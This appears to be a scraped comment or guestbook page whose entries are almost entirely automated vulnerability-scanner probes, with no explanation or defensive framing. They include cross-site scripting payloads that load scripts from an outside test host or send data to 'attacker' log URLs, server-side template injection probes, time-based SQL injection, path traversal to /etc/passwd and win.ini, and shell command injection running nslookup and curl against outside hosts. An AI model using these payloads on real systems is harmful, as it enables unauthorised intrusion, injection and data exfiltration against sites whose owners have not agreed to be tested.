XcwJRDFY
12/01/2024

1

image
XcwJRDFY9425636
12/01/2024

1

image
'}#{98991*97996*98991*97996}
12/01/2024

1

image
<th:t="${dfb}#foreach
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<img src=//xss.bxss.me/t/dot.gif onload=aHwx(9595)>

image
'}}dfb{{'abcd'.toUpperCase()}}xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
bfg5172<s1﹥s2ʺs3ʹhjl5172
12/01/2024

1

image
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
12/01/2024

1

image
'}}}dfb{{{this}}}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<input autofocus onfocus=uMz1(9876)>

image
'}#{98991*97996*98991*97996}
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

<a HrEF=http://xss.bxss.me></a>

image
<th:t="${dfb}#foreach
12/01/2024

1

image
'}dfb#{xca}=123
12/01/2024

1

image
dfb[[${98991*97996}]]xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1\u003CScRiPt\aHwx(9150)\u003C/sCripT\u003E

image
dfb__${98991*97996}__::.x
12/01/2024

1

image
dfb{{98991*97996}}xca
12/01/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
XcwJRDFY<ScRiPt >vccT(9725)</ScRiPt>
12/01/2024

1

image
dfb${98991*97996}xca
12/01/2024

1

image
dfb#{98991*97996}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

<a HrEF=jaVaScRiPT:>

image
dfb{@98991*97996}xca
12/01/2024

1

image
1}dfb{#98991*97996}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1xT6cZ <ScRiPt >aHwx(9604)</ScRiPt>

image
dfb{{=98991*97996}}xca
12/01/2024

1

image
XcwJRDFY<ScR<ScRiPt>IpT>vccT(9861)</sCr<ScRiPt>IpT>
12/01/2024

1

image
dfb@(98991*97996)xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<ifRAme sRc=9339.com></IfRamE>

image
1}dfb${98991*97996}xca
12/01/2024

1

image
XcwJRDFY<ScRiPt >vccT(9542)</ScRiPt>
12/01/2024

1

image
dfb<%=98991*97996%>xca
12/01/2024

1

image
1}}dfb{{=98991*97996}}xca
12/01/2024

1

image
XcwJRDFY<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9955></ScRiPt>
12/01/2024

1

image
dfb#set($x=98991*97996)${x}xca
12/01/2024

1

image
1%>dfb<%=98991*97996%>xca
12/01/2024

1

image
dfb{{"abc"|title}}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<aN01plK<

image
1}dfb{@98991*97996}xca
12/01/2024

1

image
print("dfb" . 98991*97996 . "xca");
12/01/2024

1

image
XcwJRDFY<isindex type=image src=1 onerror=vccT(9279)>
12/01/2024

1

image
1}}dfb{{=98991*97996}}xca
12/01/2024

1

image
1}dfb{{"abc"|title}}xca
12/01/2024

1

image
98991*97996*98991*97996
12/01/2024

1

image
XcwJRDFY<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9383'>
12/01/2024

1

image
dfb{@math key=98991 method="multiply" operand=97996/}xca
12/01/2024

1

image
XcwJRDFY<body onload=vccT(9156)>
12/01/2024

1

image
198991*97996*98991*97996
12/01/2024

1

image
dfb{{{this}}}xca
12/01/2024

1

image
1}dfb#set($x=98991*97996)${x}xca
12/01/2024

1

image
XcwJRDFY<img src=//xss.bxss.me/t/dot.gif onload=vccT(9393)>
12/01/2024

1

image
XcwJRDFY<img src=xyz OnErRor=vccT(9712)>
12/01/2024

1

image
#{98991*97996*98991*97996}
12/01/2024

1

image
XcwJRDFY<img/src=">" onerror=alert(9565)>
12/01/2024

1

image
dfb#{xca}=123
12/01/2024

1

image
1}#{98991*97996*98991*97996}
12/01/2024

1

image
1}dfb{@math key=98991 method="multiply" operand=97996/}xca
12/01/2024

1

image
dfb{{'abcd'.toUpperCase()}}xca
12/01/2024

1

image
%58%63%77%4A%52%44%46%59%3C%53%63%52%69%50%74%20%3E%76%63%63%54%289384%29%3C%2F%73%43%72%69%70%54%3E
12/01/2024

1

image
XcwJRDFY\u003CScRiPt\vccT(9215)\u003C/sCripT\u003E
12/01/2024

1

image
1}#{98991*97996*98991*97996}
12/01/2024

1

image
1}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
12/01/2024

1

image
XcwJRDFY&lt;ScRiPt&gt;vccT(9548)&lt;/sCripT&gt;
12/01/2024

1

image
1}}dfb{{'abcd'.toUpperCase()}}xca
12/01/2024

1

image
1}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
12/01/2024

1

image
dfb__${98991*97996}__::.x
12/01/2024

1

image
XcwJRDFY<input autofocus onfocus=vccT(9219)>
12/01/2024

1

image
XcwJRDFY<ScRiPt >8zg3(9283)</ScRiPt>
12/01/2024

1

image
1}dfb[[${98991*97996}]]xca
12/01/2024

1

image
<a HrEF=http://xss.bxss.me></a>
12/01/2024

1

image
1dfb__${98991*97996}__::.x
12/01/2024

1

image
<a HrEF=jaVaScRiPT:>
12/01/2024

1

image
XcwJRDFY<script>8zg3(9679)</script>
12/01/2024

1

image
XcwJRDFY}body{zzz:Expre/**/SSion(vccT(9973))}
12/01/2024

1

image
XcwJRDFY<script>8zg3(9497)</script>9497
12/01/2024

1

image
HfjNUlYZ<script>y6OY(9038)</script>9038
12/01/2024

1

image
HfjNUlYZ<script>Pk6z(9448)</script>
12/01/2024

1

image
XcwJRDFYa7SDQ <ScRiPt >vccT(9962)</ScRiPt>
12/01/2024

1

image
XcwJRDFY<ScR<ScRiPt>IpT>8zg3(9706)</sCr<ScRiPt>IpT>
12/01/2024

1

image
XcwJRDFY'"()&%<zzz><ScRiPt >TR59(9512)</ScRiPt>
12/01/2024

1

image
'"()&%<zzz><ScRiPt >TR59(9659)</ScRiPt>
12/01/2024

1

image
XcwJRDFY<ScRiPt >8zg3(9228)</ScRiPt>
12/01/2024

1

image
XcwJRDFY<ifRAme sRc=9869.com></IfRamE>
12/01/2024

1

image
'"()&%<zzz><ScRiPt >sGUm(9184)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ<ScRiPt >Pk6z(9141)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ<ScRiPt >y6OY(9377)</ScRiPt>
12/01/2024

1

image
XcwJRDFY9232955
12/01/2024

1

image
XcwJRDFY<aZefHN1 x=9760>
12/01/2024

1

image
XcwJRDFY9955488
12/01/2024

1

image
XcwJRDFY<ScRiPt >8zg3(9898)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9313></ScRiPt>
12/01/2024

1

image
XcwJRDFY<img sRc='http://attacker-9100/log.php?
12/01/2024

1

image
HfjNUlYZ<isindex type=image src=1 onerror=y6OY(9105)>
12/01/2024

1

image
XcwJRDFY<isindex type=image src=1 onerror=8zg3(9076)>
12/01/2024

1

image
XcwJRDFY<avf7Xu5<
12/01/2024

1

image
XcwJRDFY'"()&%<zzz><ScRiPt >C7gw(9207)</ScRiPt>
12/01/2024

1

image
XcwJRDFY<body onload=8zg3(9867)>
12/01/2024

1

image
<%={{={@{#{${dfb}}%>
12/01/2024

1

image
XcwJRDFY<img src=//xss.bxss.me/t/dot.gif onload=8zg3(9110)>
12/01/2024

1

image
HfjNUlYZ<img src=xyz OnErRor=y6OY(9285)>
12/01/2024

1

image
XcwJRDFY9445062
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY<img/src=">" onerror=alert(9705)>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY\u003CScRiPt\8zg3(9367)\u003C/sCripT\u003E
12/01/2024

1

image
XcwJRDFY&lt;ScRiPt&gt;8zg3(9652)&lt;/sCripT&gt;
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY<input autofocus onfocus=8zg3(9004)>
12/01/2024

1

image
dfb[[${98991*97996}]]xca
12/01/2024

1

image
<a HrEF=http://xss.bxss.me></a>
12/01/2024

1

image
<a HrEF=http://xss.bxss.me></a>
12/01/2024

1

image
dfb__${98991*97996}__::.x
12/01/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
HfjNUlYZ<input autofocus onfocus=Pk6z(9097)>
12/01/2024

1

image
XcwJRDFY}body{zzz:Expre/**/SSion(8zg3(9707))}
12/01/2024

1

image
XcwJRDFY8gc5O <ScRiPt >8zg3(9995)</ScRiPt>
12/01/2024

1

image
XcwJRDFY<WXVBXV>TCDIV[!+!]</WXVBXV>
12/01/2024

1

image
XcwJRDFY<script>sGUm(9815)</script>
12/01/2024

1

image
XcwJRDFY<a6DIa86 x=9788>
12/01/2024

1

image
XcwJRDFY<script>sGUm(9866)</script>9866
12/01/2024

1

image
XcwJRDFY<img sRc='http://attacker-9569/log.php?
12/01/2024

1

image
XcwJRDFY<ayK05X9<
12/01/2024

1

image
HfjNUlYZ<img sRc='http://attacker-9395/log.php?
12/01/2024

1

image
XcwJRDFY<ScRiPt >sGUm(9716)</ScRiPt>
12/01/2024

1

image
XcwJRDFY<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9322></ScRiPt>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'"()&%<zzz><ScRiPt >dcs0(9737)</ScRiPt>

image
'"()&%<zzz><ScRiPt >tPNS(9100)</ScRiPt>
12/01/2024

1

image
XcwJRDFY<ScRiPt >sGUm(9872)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ<akxKTDX<
12/01/2024

1

image
XcwJRDFY<body onload=sGUm(9300)>
12/01/2024

1

image
XcwJRDFY<img src=//xss.bxss.me/t/dot.gif onload=sGUm(9908)>
12/01/2024

1

image
XcwJRDFY<img src=xyz OnErRor=sGUm(9606)>
12/01/2024

1

image
%58%63%77%4A%52%44%46%59%3C%53%63%52%69%50%74%20%3E%73%47%55%6D%289973%29%3C%2F%73%43%72%69%70%54%3E
12/01/2024

1

image
XcwJRDFY\u003CScRiPt\sGUm(9789)\u003C/sCripT\u003E
12/01/2024

1

image
XcwJRDFY<input autofocus onfocus=sGUm(9165)>
12/01/2024

1

image
<a HrEF=http://xss.bxss.me></a>
12/01/2024

1

image
<a HrEF=jaVaScRiPT:>
12/01/2024

1

image
XcwJRDFY}body{zzz:Expre/**/SSion(sGUm(9123))}
12/01/2024

1

image
XcwJRDFYfJ8Tx <ScRiPt >sGUm(9648)</ScRiPt>
12/01/2024

1

image
XcwJRDFY<ifRAme sRc=9907.com></IfRamE>
12/01/2024

1

image
XcwJRDFY<aZceNJI x=9703>
12/01/2024

1

image
XcwJRDFY<abRIUp4<
12/01/2024

1

image
'"()&%<zzz><ScRiPt >TsPf(9674)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'"()&%<zzz><ScRiPt >io48(9893)</ScRiPt>

image
bfg9972<s1﹥s2ʺs3ʹhjl9972
12/01/2024

1

image
HfjNUlYZ
12/01/2024

<%={{={@{#{${dfb}}%>

image
dfb[[${98991*97996}]]xca
12/01/2024

1

image
HfjNUlYZ<ScRiPt >TsPf(9307)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

"}}dfb{{98991*97996}}xca

image
HfjNUlYZ<WWK6QX>K4NHU[!+!]</WWK6QX>
12/01/2024

1

image
HfjNUlYZ<script>TsPf(9300)</script>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

"}dfb{@98991*97996}xca

image
HfjNUlYZ
12/01/2024

"}}dfb{{=98991*97996}}xca

image
HfjNUlYZ<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9090></ScRiPt>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

"}dfb#set($x=98991*97996)${x}xca

image
HfjNUlYZ<isindex type=image src=1 onerror=TsPf(9267)>
12/01/2024

1

image
HfjNUlYZ<img src=xyz OnErRor=TsPf(9177)>
12/01/2024

1

image
%48%66%6A%4E%55%6C%59%5A%3C%53%63%52%69%50%74%20%3E%54%73%50%66%289009%29%3C%2F%73%43%72%69%70%54%3E
12/01/2024

1

image
HfjNUlYZ
12/01/2024

"}}dfb{{'abcd'.toUpperCase()}}xca

image
HfjNUlYZ\u003CScRiPt\TsPf(9670)\u003C/sCripT\u003E
12/01/2024

1

image
HfjNUlYZ
12/01/2024

"}dfb[[${98991*97996}]]xca

image
HfjNUlYZ<input autofocus onfocus=TsPf(9144)>
12/01/2024

1

image
HfjNUlYZeGzHf <ScRiPt >TsPf(9984)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'}dfb{98991*97996}xca

image
HfjNUlYZ
12/01/2024

'}dfb${98991*97996}xca

image
HfjNUlYZ<W5XKVL>WSQXU[!+!]</W5XKVL>
12/01/2024

1

image
HfjNUlYZ<a5seFCj x=9573>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'}dfb{#98991*97996}xca

image
HfjNUlYZ<img sRc='http://attacker-9803/log.php?
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'print("dfb" . 98991*97996 . "xca");

image
XcwJRDFY
12/01/2024

'"()&%<zzz><ScRiPt >hElA(9991)</ScRiPt>

image
XcwJRDFY'"()&%<zzz><ScRiPt >mM0v(9584)</ScRiPt>
12/01/2024

1

image
'"()&%<zzz><ScRiPt >mM0v(9793)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1}}dfb{{98991*97996}}xca

image
XcwJRDFY9852322
12/01/2024

1

image
XcwJRDFY'"()&%<zzz><ScRiPt >BFwp(9131)</ScRiPt>
12/01/2024

1

image
XcwJRDFY'"()&%<zzz><ScRiPt >D92f(9232)</ScRiPt>
12/01/2024

1

image
'"()&%<zzz><ScRiPt >BFwp(9021)</ScRiPt>
12/01/2024

1

image
'"()&%<zzz><ScRiPt >D92f(9509)</ScRiPt>
12/01/2024

1

image
XcwJRDFY9170101
12/01/2024

1

image
bfg10779<s1﹥s2ʺs3ʹhjl10779
12/01/2024

1

image
XcwJRDFY9553469
12/01/2024

1

image
XcwJRDFY
12/01/2024

'"()&%<zzz><ScRiPt >xJuD(9014)</ScRiPt>

image
XcwJRDFY
12/01/2024

1

image
bfg4441<s1﹥s2ʺs3ʹhjl4441
12/01/2024

1

image
dfb{{98991*97996}}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1%>dfb<%=98991*97996%>xca

image
dfb{{98991*97996}}xca
12/01/2024

1

image
<%={{={@{#{${dfb}}%>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1}dfb#set($x=98991*97996)${x}xca

image
<th:t="${dfb}#foreach
12/01/2024

1

image
dfb{98991*97996}xca
12/01/2024

1

image
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
12/01/2024

1

image
<th:t="${dfb}#foreach
12/01/2024

1

image
dfb${98991*97996}xca
12/01/2024

1

image
dfb{{98991*97996}}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1}dfb{@math key=98991 method="multiply" operand=97996/}xca

image
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
12/01/2024

1

image
dfb[[${98991*97996}]]xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1}}}dfb{{{this}}}xca

image
dfb{#98991*97996}xca
12/01/2024

1

image
dfb__${98991*97996}__::.x
12/01/2024

1

image
dfb{{98991*97996}}xca
12/01/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
dfb[[${98991*97996}]]xca
12/01/2024

1

image
dfb{{=98991*97996}}xca
12/01/2024

1

image
XcwJRDFY<ScRiPt >D92f(9752)</ScRiPt>
12/01/2024

1

image
dfb__${98991*97996}__::.x
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
XcwJRDFY<W52YRZ>FDUTU[!+!]</W52YRZ>
12/01/2024

1

image
dfb<%=98991*97996%>xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1}}dfb{{98991*97996}}xca

image
dfb#set($x=98991*97996)${x}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1}dfb[[${98991*97996}]]xca

image
XcwJRDFY<script>D92f(9411)</script>9411
12/01/2024

1

image
XcwJRDFY<WBFFWW>DLJ7Z[!+!]</WBFFWW>
12/01/2024

1

image
dfb{{"abc"|title}}xca
12/01/2024

1

image
XcwJRDFY<ScR<ScRiPt>IpT>D92f(9339)</sCr<ScRiPt>IpT>
12/01/2024

1

image
print("dfb" . 98991*97996 . "xca");
12/01/2024

1

image
98991*97996*98991*97996
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<WPVVRJ>RQIFY[!+!]</WPVVRJ>

image
XcwJRDFY<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9710></ScRiPt>
12/01/2024

1

image
dfb{@math key=98991 method="multiply" operand=97996/}xca
12/01/2024

1

image
XcwJRDFY<ScRiPt >D92f(9348)</ScRiPt>
12/01/2024

1

image
dfb{{{this}}}xca
12/01/2024

1

image
XcwJRDFY<ScRiPt >BFwp(9746)</ScRiPt>
12/01/2024

1

image
#{98991*97996*98991*97996}
12/01/2024

1

image
XcwJRDFY<isindex type=image src=1 onerror=D92f(9572)>
12/01/2024

1

image
XcwJRDFY<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9015></ScRiPt>
12/01/2024

1

image
dfb#{xca}=123
12/01/2024

1

image
XcwJRDFY<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9510'>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<ScRiPt >ykGU(9186)</ScRiPt>

image
XcwJRDFY<ScRiPt >BFwp(9473)</ScRiPt>
12/01/2024

1

image
dfb{{'abcd'.toUpperCase()}}xca
12/01/2024

1

image
XcwJRDFY<body onload=D92f(9441)>
12/01/2024

1

image
AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
12/01/2024

1

image
XcwJRDFY<img src=//xss.bxss.me/t/dot.gif onload=D92f(9091)>
12/01/2024

1

image
dfb{{98991*97996}}xca
12/01/2024

1

image
XcwJRDFY<isindex type=image src=1 onerror=BFwp(9281)>
12/01/2024

1

image
XcwJRDFY<img src=xyz OnErRor=D92f(9643)>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<ScRiPt >ykGU(9042)</ScRiPt>

image
dfb[[${98991*97996}]]xca
12/01/2024

1

image
XcwJRDFY<body onload=BFwp(9583)>
12/01/2024

1

image
%58%63%77%4A%52%44%46%59%3C%53%63%52%69%50%74%20%3E%44%39%32%66%289710%29%3C%2F%73%43%72%69%70%54%3E
12/01/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<img src=//xss.bxss.me/t/dot.gif onload=ykGU(9119)>

image
XcwJRDFY<img src=//xss.bxss.me/t/dot.gif onload=BFwp(9538)>
12/01/2024

1

image
XcwJRDFY<img src=xyz OnErRor=BFwp(9174)>
12/01/2024

1

image
XcwJRDFY<WUGQSQ>IJCAG[!+!]</WUGQSQ>
12/01/2024

1

image
XcwJRDFY&lt;ScRiPt&gt;D92f(9321)&lt;/sCripT&gt;
12/01/2024

1

image
XcwJRDFY<script>mM0v(9860)</script>
12/01/2024

1

image
XcwJRDFY<img/src=">" onerror=alert(9878)>
12/01/2024

1

image
%58%63%77%4A%52%44%46%59%3C%53%63%52%69%50%74%20%3E%42%46%77%70%289403%29%3C%2F%73%43%72%69%70%54%3E
12/01/2024

1

image
XcwJRDFY<script>mM0v(9253)</script>9253
12/01/2024

1

image
XcwJRDFY<input autofocus onfocus=D92f(9622)>
12/01/2024

1

image
XcwJRDFY<ScR<ScRiPt>IpT>mM0v(9491)</sCr<ScRiPt>IpT>
12/01/2024

1

image
XcwJRDFY\u003CScRiPt\BFwp(9612)\u003C/sCripT\u003E
12/01/2024

1

image
XcwJRDFY&lt;ScRiPt&gt;BFwp(9779)&lt;/sCripT&gt;
12/01/2024

1

image
XcwJRDFY<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9935></ScRiPt>
12/01/2024

1

image
XcwJRDFY}body{zzz:Expre/**/SSion(D92f(9478))}
12/01/2024

1

image
XcwJRDFY<ScRiPt >mM0v(9276)</ScRiPt>
12/01/2024

1

image
XcwJRDFY<isindex type=image src=1 onerror=mM0v(9309)>
12/01/2024

1

image
XcwJRDFY<WIIEIQ>VEFIL[!+!]</WIIEIQ>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<ifRAme sRc=9504.com></IfRamE>

image
<a HrEF=http://xss.bxss.me></a>
12/01/2024

1

image
XcwJRDFY<ifRAme sRc=9143.com></IfRamE>
12/01/2024

1

image
XcwJRDFY<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9981'>
12/01/2024

1

image
<a HrEF=jaVaScRiPT:>
12/01/2024

1

image
XcwJRDFY}body{zzz:Expre/**/SSion(BFwp(9572))}
12/01/2024

1

image
XcwJRDFY<img sRc='http://attacker-9063/log.php?
12/01/2024

1

image
XcwJRDFYbqm3D <ScRiPt >BFwp(9290)</ScRiPt>
12/01/2024

1

image
XcwJRDFY<img src=//xss.bxss.me/t/dot.gif onload=mM0v(9685)>
12/01/2024

1

image
XcwJRDFY<arEWGMI<
12/01/2024

1

image
XcwJRDFY<img src=xyz OnErRor=mM0v(9862)>
12/01/2024

1

image
XcwJRDFY<WUMQHV>GZJ5Y[!+!]</WUMQHV>
12/01/2024

1

image
XcwJRDFY<ifRAme sRc=9512.com></IfRamE>
12/01/2024

1

image
%58%63%77%4A%52%44%46%59%3C%53%63%52%69%50%74%20%3E%6D%4D%30%76%289531%29%3C%2F%73%43%72%69%70%54%3E
12/01/2024

1

image
XcwJRDFY<aE3eovz x=9829>
12/01/2024

1

image
XcwJRDFY\u003CScRiPt\mM0v(9911)\u003C/sCripT\u003E
12/01/2024

1

image
XcwJRDFY<img sRc='http://attacker-9187/log.php?
12/01/2024

1

image
XcwJRDFY&lt;ScRiPt&gt;mM0v(9549)&lt;/sCripT&gt;
12/01/2024

1

image
XcwJRDFY<aVPEgX6<
12/01/2024

1

image
XcwJRDFY<input autofocus onfocus=mM0v(9483)>
12/01/2024

1

image
<a HrEF=http://xss.bxss.me></a>
12/01/2024

1

image
XcwJRDFYYKZQP <ScRiPt >mM0v(9176)</ScRiPt>
12/01/2024

1

image
XcwJRDFY<WBCKSX>XCBSN[!+!]</WBCKSX>
12/01/2024

1

image
XcwJRDFY<ifRAme sRc=9882.com></IfRamE>
12/01/2024

1

image
XcwJRDFY<amDOEBF x=9957>
12/01/2024

1

image
XcwJRDFY<ad3TkrL<
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
VG0ycjNiRVM=
12/01/2024

1

image
sOdPqaAH
12/01/2024

/../../../../../../../../../../windows/system32/BITSADMIN.exe

image
sOdPqaAH
12/01/2024

"+response.write(9387356*9047970)+"

image
"+response.write(9589353*9139005)+"
12/01/2024

1

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

-1 OR 2+196-196-1=0+0+0+1 --

image
sOdPqaAH
12/01/2024

|echo eglfji$()\ aafegj\nz^xyu||a #' |echo eglfji$()\ aafegj\nz^xyu||a #|" |echo eglfji$()\ aafegj\nz^xyu||a #

image
sOdPqaAH
12/01/2024

-1" OR 2+753-753-1=0+0+0+1 --

image
../../../../../../../../../../../../../../etc/passwd
12/01/2024

1

image
sOdPqaAH
12/01/2024

&(nslookup -q=cname hitmalizqxlppcae6f.bxss.me||curl hitmalizqxlppcae6f.bxss.me)&'\"`0&(nslookup -q=cname hitmalizqxlppcae6f.bxss.me||curl hitmalizqxlppcae6f.bxss.me)&`'

image
sOdPqaAH
12/01/2024

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

image
../../../../../../../../../../../../../../windows/win.ini
12/01/2024

1

image
sOdPqaAH
12/01/2024

|(nslookup -q=cname hitmmwabhyzmgd2b36.bxss.me||curl hitmmwabhyzmgd2b36.bxss.me)

image
sOdPqaAH
12/01/2024

-1); waitfor delay '0:0:15' --

image
sOdPqaAH
12/01/2024

1

image
../sOdPqaAH
12/01/2024

1

image
sOdPqaAH|echo wowilo$()\ oxdkcl\nz^xyu||a #' |echo wowilo$()\ oxdkcl\nz^xyu||a #|" |echo wowilo$()\ oxdkcl\nz^xyu||a #
12/01/2024

1

image
sOdPqaAH
12/01/2024

xG37u6HK')); waitfor delay '0:0:15' --

image
(nslookup -q=cname hitlrmwvopmcee7707.bxss.me||curl hitlrmwvopmcee7707.bxss.me))
12/01/2024

1

image
$(nslookup -q=cname hitkebvhiswqa9c758.bxss.me||curl hitkebvhiswqa9c758.bxss.me)
12/01/2024

1

image
sOdPqaAH
12/01/2024

-5) OR 48=(SELECT 48 FROM PG_SLEEP(15))--

image
sOdPqaAH
12/01/2024

8BQZNKB9' OR 390=(SELECT 390 FROM PG_SLEEP(15))--

image
|(nslookup -q=cname hitffrmlrceds5102f.bxss.me||curl hitffrmlrceds5102f.bxss.me)
12/01/2024

1

image
sOdPqaAH
12/01/2024

hjRvaQiE') OR 617=(SELECT 617 FROM PG_SLEEP(15))--

image
sOdPqaAH
12/01/2024

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

image
sOdPqaAH
12/01/2024

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

image
sOdPqaAH
12/01/2024

1

image
-1 OR 2+879-879-1=0+0+0+1
12/01/2024

1

image
-1' OR 2+775-775-1=0+0+0+1 or 'WeM3eOEL'='
12/01/2024

1

image
Http://bxss.me/t/fit.txt
12/01/2024

1

image
!(()&&!|*|*|
12/01/2024

1

image
http://bxss.me/t/fit.txt?.jpg
12/01/2024

1

image
-1" OR 2+846-846-1=0+0+0+1 --
12/01/2024

1

image
/etc/shells
12/01/2024

1

image
c:/windows/win.ini
12/01/2024

1

image
bxss.me
12/01/2024

1

image
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
12/01/2024

1

image
sOdPqaAH
12/01/2024

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

image
sOdPqaAH
12/01/2024

${@print(md5(31337))}\

image
sOdPqaAH
12/01/2024

1

image
sOdPqaAH
12/01/2024

HttP://bxss.me/t/xss.html?%00

image
sOdPqaAH
12/01/2024

'"()

image
sOdPqaAH
12/01/2024

bxss.me/t/xss.html?%00

image
sOdPqaAH
12/01/2024

1'&&sleep(27*1000)*qxhtfq&&'

image
sOdPqaAH
12/01/2024

'+'A'.concat(70-3).concat(22*4).concat(118).concat(65).concat(118).concat(68)+(require'socket' Socket.gethostbyname('hitnt'+'ltunxbqpded27.bxss.me.')[3].to_s)+'

image
"+"A".concat(70-3).concat(22*4).concat(105).concat(79).concat(115).concat(68)+(require"socket" Socket.gethostbyname("hitlz"+"hyolgpse8a4d8.bxss.me.")[3].to_s)+"
12/01/2024

1

image
'+'A'.concat(70-3).concat(22*4).concat(114).concat(84).concat(109).concat(78)+(require'socket' Socket.gethostbyname('hitmv'+'uozhzlosddd40.bxss.me.')[3].to_s)+'
12/01/2024

1

image
sOdPqaAH
12/01/2024

comment

image
comment
12/01/2024

1

image
sOdPqaAH"&&sleep(27*1000)*ltfmev&&"
12/01/2024

1

image
<!--
12/01/2024

1

image
sOdPqaAH
12/01/2024

1'"()&%<zzz><ScRiPt >Sc2Z(9098)</ScRiPt>

image
sOdPqaAH
12/01/2024

'"()&%<zzz><ScRiPt >Sc2Z(9800)</ScRiPt>

image
sOdPqaAH
12/01/2024

<th:t="${dfb}#foreach

image
sOdPqaAH
12/01/2024

"}}dfb{{98991*97996}}xca

image
sOdPqaAH
12/01/2024

'}}dfb{{98991*97996}}xca

image
sOdPqaAH
12/01/2024

'}dfb{{"abc"|title}}xca

image
sOdPqaAH
12/01/2024

'}}}dfb{{{this}}}xca

image
sOdPqaAH
12/01/2024

'}dfb#{xca}=123

image
sOdPqaAH
12/01/2024

'dfb__${98991*97996}__::.x

image
sOdPqaAH
12/01/2024

'}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1ca6SoSYO

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

ayIqEpuK

image
HfjNUlYZ
12/01/2024

|(nslookup -q=cname hitzhfsfamjqra862d.bxss.me||curl hitzhfsfamjqra862d.bxss.me)

image
HfjNUlYZ
12/01/2024

-1; waitfor delay '0:0:15' --

image
&echo fdwsxy$()\ pnxtxh\nz^xyu||a #' &echo fdwsxy$()\ pnxtxh\nz^xyu||a #|" &echo fdwsxy$()\ pnxtxh\nz^xyu||a #
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1 waitfor delay '0:0:15' --

image
